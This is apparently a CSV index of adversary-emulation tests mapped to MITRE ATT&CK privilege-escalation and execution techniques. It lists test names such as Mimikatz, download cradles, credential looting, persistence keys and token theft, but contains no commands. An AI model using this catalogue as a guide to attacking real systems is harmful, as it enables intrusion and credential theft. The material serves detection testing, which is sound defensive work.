privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
privilege-escalation,T1134.004,Access Token Manipulation: Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
privilege-escalation,T1546.001,Event Triggered Execution: Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
privilege-escalation,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,10,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,acfef903-7662-447e-a391-9c91c2f00f7b,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,11,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,8834b65a-f808-4ece-ad7e-2acdf647aafa,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,12,HKCU - Policy Settings Explorer Run Key,a70faea1-e206-4f6f-8d9a-67379be8f6f1,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,13,HKLM - Policy Settings Explorer Run Key,b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,14,HKLM - Append Command to Winlogon Userinit KEY Value,f7fab6cc-8ece-4ca7-a0f1-30a22fccd374,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,4,Snake Malware Kernel Driver Comadmin,e5cb5564-cc7b-4050-86e8-f2d9eec1941f,powershell
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
privilege-escalation,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,4,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,5,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,6,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
privilege-escalation,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1543.002,Create or Modify System Process: Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Create or Modify System Process: Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
privilege-escalation,T1574.002,Hijack Execution Flow: DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
privilege-escalation,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
privilege-escalation,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
execution,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
execution,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Remote Services,0fd48ef7-d890-4e93-a533-f7dedd5191d3,command_prompt
execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt
execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
execution,T1047,Windows Management Instrumentation,9,WMI Execute rundll32,00738d2a-4651-4d76-adf2-c43a41dfb243,powershell
execution,T1047,Windows Management Instrumentation,10,Application uninstall using WMIC,c510d25b-1667-467d-8331-a56d3e9bc4ff,command_prompt
execution,T1059.007,Command and Scripting Interpreter: JavaScript,1,JScript execution to gather local computer information via cscript,01d75adf-ca1b-4dd1-ac96-7c9550ad1035,command_prompt
execution,T1059.007,Command and Scripting Interpreter: JavaScript,2,JScript execution to gather local computer information via wscript,0709945e-4fec-4c49-9faf-c3c292a74484,command_prompt
execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
execution,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt
execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,3,DDEAUTO,cf91174c-4e74-414e-bec0-8d60a104d181,manual
execution,T1204.002,User Execution: Malicious File,1,OSTap Style Macro Execution,8bebc690-18c7-4549-bc98-210f7019efff,powershell
execution,T1204.002,User Execution: Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-85d3-ba4daa739d80,command_prompt
execution,T1204.002,User Execution: Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,User Execution: Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,User Execution: Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,User Execution: Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1204.002,User Execution: Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
execution,T1204.002,User Execution: Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1204.002,User Execution: Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1204.002,User Execution: Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
execution,T1204.002,User Execution: Malicious File,11,Mirror Blast Emulation,24fd9719-7419-42dd-bce6-ab3463110b3c,powershell
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1059.002,Command and Scripting Interpreter: AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash
execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,4,Obfuscation Tests,4297c41a-8168-4138-972d-01f3ee92c804,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,5,Mimikatz - Cradlecraft PsSendKeys,af1800cf-9f9d-4fd1-a709-14b1e6de020d,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,6,Invoke-AppPathBypass,06a220b6-7e29-4bd8-9d07-5b4d86742372,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,7,Powershell MsXml COM object - with prompt,388a7340-dbc1-4c9d-8e59-b75ad8c6d5da,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,8,Powershell XML requests,4396927f-e503-427b-b023-31049b9b09a6,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,9,Powershell invoke mshta.exe download,8a2ad40b-12c7-4b25-8521-2737b0a415af,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,10,Powershell Invoke-DownloadCradle,cc50fa2a-a4be-42af-a88f-e347ba0bf4d7,manual
execution,T1059.001,Command and Scripting Interpreter: PowerShell,11,PowerShell Fileless Script Execution,fa050f5e-bc75-4230-af73-b6fd7852cd73,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,12,PowerShell Downgrade Attack,9148e7c4-9356-420e-a416-e896e9c0f73e,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,13,NTFS Alternate Data Stream Access,8e5c5532-1181-4c1d-bb79-b3a9f5dbd680,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,14,PowerShell Session Creation and Use,7c1acec2-78fa-4305-a3e0-db2a54cddecd,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,15,ATHPowerShellCommandLineParameter -Command parameter variations,686a9785-f99b-41d4-90df-66ed515f81d7,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,5,New script file in the tmp directory,8cd1947b-4a54-41fb-b5ea-07d0ace04f81,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is running,7b38e5cc-47be-44f0-a425-390305c76c17,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,12,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,bash
execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt
execution,T1559,Inter-Process Communication,4,Cobalt Strike post-exploitation pipe (4.2 and later),7a48f482-246f-4aeb-9837-21c271ebf244,command_prompt
execution,T1559,Inter-Process Communication,5,Cobalt Strike post-exploitation pipe (before 4.2),8dbfc15c-527b-4ab0-a272-019f469d367f,command_prompt
execution,T1204.003,User Execution: Malicious Image,1,Malicious Execution from Mounted ISO Image,e9795c8d-42aa-4ed4-ad80-551ed793d006,powershell
execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
